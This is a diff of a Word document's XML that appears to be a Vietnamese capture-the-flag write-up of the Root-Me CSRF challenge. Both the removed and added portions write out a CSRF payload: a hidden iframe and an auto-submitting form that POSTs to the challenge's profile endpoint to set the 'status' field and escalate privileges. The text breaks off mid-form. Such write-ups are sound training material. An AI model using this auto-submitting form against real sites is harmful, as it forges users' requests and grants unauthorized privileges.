--- a/BT3456/4/410.docx
+++ b/BT3456/4/410.docx
@@ -3,62 +3,979 @@
 <w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
   <w:body>
     <w:p>
-      <w:r>
-        <w:t>&lt;iframe style="</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>display:none</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>" name="csrf-frame"&gt;&lt;/iframe&gt;</w:t>
-      </w:r>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
+        <w:spacing w:after="0" w:line="360" w:lineRule="atLeast"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="NanumGothic" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    &lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>form  id</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>="csrf-form" target="csrf-frame" action="http://challenge01.root-me.org/web-client/ch22/index.php?action=profile" method="POST" enctype="multipart/form-data"&gt;</w:t>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
+        <w:spacing w:after="0" w:line="360" w:lineRule="atLeast"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="NanumGothic" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="NanumGothic" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+        <w:t>Đầu tiên vào trang web đăng ký và đăng nhập, thì ta thấy được phần form không filter</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:t xml:space="preserve">      &lt;input type="hidden" name="username" value="user" /&gt;</w:t>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
+        <w:spacing w:after="0" w:line="360" w:lineRule="atLeast"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="NanumGothic" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0311B49B" wp14:editId="3C18B93F">
+            <wp:extent cx="5943600" cy="3343275"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="1084463285" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1084463285" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId4"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3343275"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:t xml:space="preserve">      &lt;input type="hidden" name="status" value="on" /&gt;</w:t>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
+        <w:spacing w:after="0" w:line="360" w:lineRule="atLeast"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="NanumGothic" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="NanumGothic" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+        <w:t>Và phần nâng cấp profile</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:t xml:space="preserve">      &lt;input type="submit" value="Submit request" /&gt;</w:t>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
+        <w:spacing w:after="0" w:line="360" w:lineRule="atLeast"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="NanumGothic" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11462295" wp14:editId="4FE59B39">
+            <wp:extent cx="5943600" cy="3343275"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="1020341664" name="Picture 1" descr="Graphical user interface, application, Word&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1020341664" name="Picture 1" descr="Graphical user interface, application, Word&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId5"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3343275"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    &lt;/form&gt;</w:t>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
+        <w:spacing w:after="0" w:line="360" w:lineRule="atLeast"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="NanumGothic" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="NanumGothic" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+        <w:t>Thực hiện tạo payload lấy từ profile leo quyền</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:t>&lt;script&gt;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>document.getElementById</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>("csrf-form").submit()&lt;/script&gt;</w:t>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
+        <w:spacing w:after="0" w:line="360" w:lineRule="atLeast"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="NanumGothic" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
+        <w:spacing w:after="0" w:line="360" w:lineRule="atLeast"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="A77F71"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>form action</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="A77F71"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="60911B"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+        <w:t>"http://challenge01.root-me.org/web-client/ch22/?action=profile"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> method</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="A77F71"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="60911B"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+        <w:t>"post"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> enctype</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="A77F71"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="60911B"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+        <w:t>"multipart/form-data"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> id</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="A77F71"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="60911B"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="60911B"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+        <w:t>kiet</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="60911B"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="60911B"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="A77F71"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
+        <w:spacing w:after="0" w:line="360" w:lineRule="atLeast"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="A77F71"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>input type</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="A77F71"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="60911B"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+        <w:t>"text"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> name</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="A77F71"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="60911B"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+        <w:t>"username"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> value</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="A77F71"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="60911B"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="60911B"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+        <w:t>kiet</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="60911B"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="60911B"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="A77F71"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FDFDFD"/>
+        <w:spacing w:after="0" w:line="360" w:lineRule="atLeast"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="A77F71"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>input type</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="A77F71"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="60911B"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+        <w:t>"checkbox"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> name</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="A77F71"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="60911B"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+        </w:rPr>
+        <w:t>"status"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Code Pro" w:eastAsia="NanumGothic" w:hAnsi="Source Code Pro" w:cs="Times New Roman"/>
+          <w:color w:val="000000"/>
